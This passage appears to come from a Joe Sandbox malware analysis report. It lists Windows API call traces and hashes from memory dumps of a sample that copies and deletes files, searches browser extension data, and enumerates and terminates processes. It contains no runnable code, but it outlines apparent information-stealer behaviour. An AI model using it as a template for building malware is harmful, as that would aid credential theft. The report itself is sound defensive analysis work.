                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocProcesswsprintf
                    • String ID: %hs
                    • API String ID: 659108358-2783943728
                    • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                    • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                    • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                    • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040AA548
                    • lstrlen.KERNEL32(00000000,00000000), ref: 040AA666
                    • lstrlen.KERNEL32(00000000), ref: 040AA923
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                    • DeleteFileA.KERNEL32(00000000), ref: 040AA9AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                    • String ID:
                    • API String ID: 257331557-0
                    • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                    • Instruction ID: ced6144387468d3576a1f3fb0eef8d894c8ab0e2acb6a4bce540f566bf4af59e
                    • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                    • Instruction Fuzzy Hash: A1E12272A10108ABDB19FBA4DD90DEEB339AF5430CF548159E196B2091EF347B48CFA5
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024B9798,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                    • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                    • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                    • String ID:
                    • API String ID: 257331557-0
                    • Opcode ID: de670670cf904c9c927a51a929ed92d79dee4ce31803c7dcd1d260c6cdf7ea42
                    • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                    • Opcode Fuzzy Hash: de670670cf904c9c927a51a929ed92d79dee4ce31803c7dcd1d260c6cdf7ea42
                    • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040AD6E8
                    • lstrlen.KERNEL32(00000000), ref: 040AD8FF
                    • lstrlen.KERNEL32(00000000), ref: 040AD913
                    • DeleteFileA.KERNEL32(00000000), ref: 040AD992
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                    • Instruction ID: 1e53f0777a4d81ab7fb935df2fb82bf691f4f5dc3d4c6a50487fd72ec3a2d225
                    • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                    • Instruction Fuzzy Hash: 13911F72A10208ABDB18FBA4DD90DEE7339AF5420CF54416DE196B2090EF747B48CFA5
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024B9798,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                    • lstrlenA.KERNEL32(00000000), ref: 0040D698
                    • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 58ef4cafaffe2497abfaa00a1ba11a8901acf803780b8d31dff15c3066b05c83
                    • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                    • Opcode Fuzzy Hash: 58ef4cafaffe2497abfaa00a1ba11a8901acf803780b8d31dff15c3066b05c83
                    • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040ADA68
                    • lstrlen.KERNEL32(00000000), ref: 040ADC06
                    • lstrlen.KERNEL32(00000000), ref: 040ADC1A
                    • DeleteFileA.KERNEL32(00000000), ref: 040ADC99
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                    • Instruction ID: 652f27b9af69d57b2953b578b4b7e30d1bc5ae09e274c891c0f8d834af19c3ad
                    • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                    • Instruction Fuzzy Hash: C9811C72A10208ABDB08FBE4DD94DEE7339AF5420CF544569E196B2090EF747A48CFA5
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024B9798,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                    • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                    • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 45a8e2ffbbbbce1f6d79d82263585e2ee75481ad9d2b77eb8bb546676890c79b
                    • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                    • Opcode Fuzzy Hash: 45a8e2ffbbbbce1f6d79d82263585e2ee75481ad9d2b77eb8bb546676890c79b
                    • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                    APIs
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                    • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 764425abfb5a9061e9931e0f88fc4c66e20ec6cd90a7d0511f203d9c21200adc
                    • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                    • Opcode Fuzzy Hash: 764425abfb5a9061e9931e0f88fc4c66e20ec6cd90a7d0511f203d9c21200adc
                    • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                    APIs
                    • memset.MSVCRT ref: 040B9752
                      • Part of subcall function 040B8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,040B9785,00000000), ref: 040B8FC2
                      • Part of subcall function 040B8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 040B8FC9
                      • Part of subcall function 040B8FB7: wsprintfW.USER32 ref: 040B8FDF
                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 040B9812
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 040B9830
                    • CloseHandle.KERNEL32(00000000), ref: 040B983D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                    • String ID:
                    • API String ID: 3729781310-0
                    • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                    • Instruction ID: 8c69cdb4e7a3d35ada54ae9290d8a15c84230011e2a2f8133784f90953928f40
                    • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                    • Instruction Fuzzy Hash: 23314AB5E40248EFEB14DFD0CC48BEDB7B9EF44304F104458E646AA284DB786A84CF96
                    APIs
                    • memset.MSVCRT ref: 004194EB
                      • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                      • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                      • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                    • CloseHandle.KERNEL32(00000000), ref: 004195D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                    • String ID:
                    • API String ID: 396451647-0
                    • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                    • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                    • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                    • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 040B8931
                    • Process32First.KERNEL32(?,00000128), ref: 040B8945
                    • Process32Next.KERNEL32(?,00000128), ref: 040B895A
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • CloseHandle.KERNEL32(?), ref: 040B89C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                    • Instruction ID: 90cb1cf10861e6568165f7aca3c02e4702d3b06efd5e4f85da6b913c67736eb9
                    • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                    • Instruction Fuzzy Hash: 36313E72A41218ABDB24EF94DD44FEEB778EB45708F104199E149B21A0DB347A44CFE5
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                    • Process32First.KERNEL32(?,00000128), ref: 004186DE
                    • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • CloseHandle.KERNEL32(?), ref: 00418761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 295465e2c392afe472870706c1eb777868b99a61b0a103c81585df39d90fc3af
                    • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                    • Opcode Fuzzy Hash: 295465e2c392afe472870706c1eb777868b99a61b0a103c81585df39d90fc3af
                    • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                    APIs
                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                    • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                    • lstrcatA.KERNEL32(?,024E9160), ref: 00414FAB
                    • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: b0342ffc00c1ba5c51a09cb54271c449f0d754700971868c6145d4cda71998d2
                    • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                    • Opcode Fuzzy Hash: b0342ffc00c1ba5c51a09cb54271c449f0d754700971868c6145d4cda71998d2
                    • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                    • wsprintfA.USER32 ref: 00418850
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 2716131235-2206825331
                    • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                    • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                    • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                    • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcessstrtok_s
                    • String ID:
